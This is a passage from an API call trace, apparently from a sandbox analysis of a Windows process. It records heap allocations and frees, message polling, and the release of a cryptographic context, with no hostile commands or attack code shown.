wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0241.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0241.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0241.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0241.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0241.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0241.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0241.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0241.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0241.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0241.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0241.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0241.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0241.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0241.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0241.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0241.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0241.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0241.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0241.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0241.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0241.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0241.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f440 | out: hHeap=0x970000) returned 1 [0241.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0241.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f698 | out: hHeap=0x970000) returned 1 [0241.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0241.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f7d8 | out: hHeap=0x970000) returned 1 [0241.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0241.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0241.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0241.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0241.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0241.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0241.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0241.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0241.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f800 | out: hHeap=0x970000) returned 1 [0241.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0241.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0241.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0241.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0241.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0241.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0241.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0241.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0241.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0241.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0241.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0241.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0241.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3f0 | out: hHeap=0x970000) returned 1 [0241.205] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0241.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f7d8 [0241.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0241.206] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0241.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f7d8 | out: hHeap=0x970000) returned 1 [0241.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0241.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f08 [0241.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0241.206] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0241.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04620 [0241.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0241.206] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0241.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04620 | out: hHeap=0x970000) returned 1 [0241.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0241.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50dd0 [0241.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0241.206] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0241.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0241.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0241.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0241.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0241.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0241.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0241.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0241.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0241.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0241.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e48 [0241.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0241.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d10 [0241.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d40 [0241.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e60 [0241.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3f0 [0241.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0241.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e00 [0241.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e78 [0241.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ea8 [0241.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0241.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0241.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0241.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0241.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0241.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0241.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0241.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0241.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0241.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0241.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0241.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0241.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3f0 | out: hHeap=0x970000) returned 1 [0241.243] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0241.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0241.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0241.243] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0241.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0241.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f041c0 [0241.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0241.243] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0241.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f041c0 | out: hHeap=0x970000) returned 1 [0241.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0241.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ea8 [0241.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0241.243] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0241.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0241.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0241.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0241.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0241.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0241.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0241.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0241.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0241.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0241.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0241.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0241.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0241.244] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0241.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0241.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0241.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0241.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f041c0 [0241.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0241.244] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0241.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f041c0 | out: hHeap=0x970000) returned 1 [0241.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0241.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50fb0 [0241.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0241.244] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0241.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0241.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0241.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0241.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0241.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0241.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0241.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0241.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0241.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0241.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0241.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0241.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0241.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0241.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0241.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0241.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0241.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0241.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0241.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0241.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f6c0 [0241.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0241.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0241.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0241.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f7d8 [0241.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0241.246] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0241.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f7d8 | out: hHeap=0x970000) returned 1 [0241.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0241.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50dd0 [0241.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0241.246] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0241.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0241.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0241.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0241.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0241.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0241.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0241.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0241.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0241.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0241.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0241.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0241.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0241.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0241.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0241.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0241.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0241.247] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0241.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0241.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0241.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0241.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0241.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0241.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0241.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0241.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0241.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0241.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0241.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0241.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0241.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0241.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0241.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0241.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0241.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0241.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0241.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0241.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0241.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0241.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0241.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0241.248] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0241.248] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0241.248] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0241.248] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0241.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0241.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0241.248] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0241.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a88 [0241.248] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69a88, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0241.248] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0241.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f7d8 [0241.248] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0241.249] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0241.249] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f7d8 | out: hHeap=0x970000) returned 1 [0241.249] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0241.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0241.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0241.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0241.249] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0241.249] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0241.249] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0241.249] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0241.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0241.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e00 [0241.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0241.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0241.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0241.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0241.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0241.249] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0241.249] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0241.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0241.250] RtlAllocateHeap 